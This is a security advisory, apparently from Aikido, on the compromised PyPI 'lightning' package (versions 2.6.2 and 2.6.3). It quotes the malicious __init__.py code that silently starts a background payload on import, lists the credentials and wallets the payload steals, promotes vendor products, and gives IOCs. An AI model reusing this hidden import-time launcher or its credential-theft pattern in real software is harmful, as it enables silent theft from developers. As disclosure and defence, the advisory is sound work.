Popular PyTorch Lightning Package Compromised by Mini Shai-Hulud

The Mini Shai-Hulud supply chain campaign has spread to PyPI. Versions 2.6.2 and 2.6.3 of the popular lightning Python package, used widely for training PyTorch models, contains malicious code that silently exfiltrates developer credentials, cloud secrets, and cryptocurrency wallets.

This comes after two recent attacks in the same campaign: the Bitwarden CLI npm compromise and the SAP npm compromise. The same attacker, same worm, now crossing from npm to PyPI.

If you are using lightning==2.6.2 or lightning==2.6.3, treat your machine as compromised.

How it works

The attack is injected directly into __init__.py, the file that runs the moment you import the package. A background thread is spawned before any legitimate Lightning code loads:

def _run_runtime() -> None:
    _runtime_dir = os.path.join(os.path.dirname(__file__), "_runtime")
    _start = os.path.join(_runtime_dir, "start.py")
    if os.path.exists(_start):
        subprocess.Popen(
            [sys.executable, _start],
            cwd=_runtime_dir,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )

threading.Thread(target=_run_runtime, daemon=True).start()

It executes start.py, a cross-platform Bun bootstrapper that detects your OS and architecture, downloads the Bun JavaScript runtime v1.3.13, and executes router_runtime.js, the main 11 MB payload. The same pattern used in the recent Bitwarden and SAP attacks.

What it steals

SSH keys, shell histories (bash, zsh, Python, Node, MySQL, psql), .env files, git credentials, AWS/GCP/Azure credentials, Kubernetes and Helm configs, Docker credentials, npm tokens, and MCP configs. Cryptocurrency wallets including Bitcoin, Litecoin, Monero, Dogecoin, Dash, Exodus, Atomic and Ledger. VPN credentials for NordVPN, ProtonVPN, CyberGhost, Windscribe and OpenVPN. Discord and Slack session data.

All stolen data is RSA-2048 encrypted before being exfiltrated to public GitHub repositories:

‍

How Aikido detects this

If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.

If you are not yet an Aikido user, you can create an account and connect your repos. Our malware coverage is included in the free plan, no credit card required.

For broader coverage across your whole team, Aikido's Endpoint Protection gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed.

For future protection, consider Aikido Safe Chain (open source). Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against Aikido Intel before install.

IOCs

• Package: lightning==2.6.2, lightning==2.6.3
• router_runtime.js
  
  • SHA256: 5f5852b5f604369945118937b058e49064612ac69826e0adadca39a357dfb5b1
• start.py
  
  • SHA256: 8046a11187c135da6959862ff3846e99ad15462d2ec8a2f77a30ad53ebd5dcf2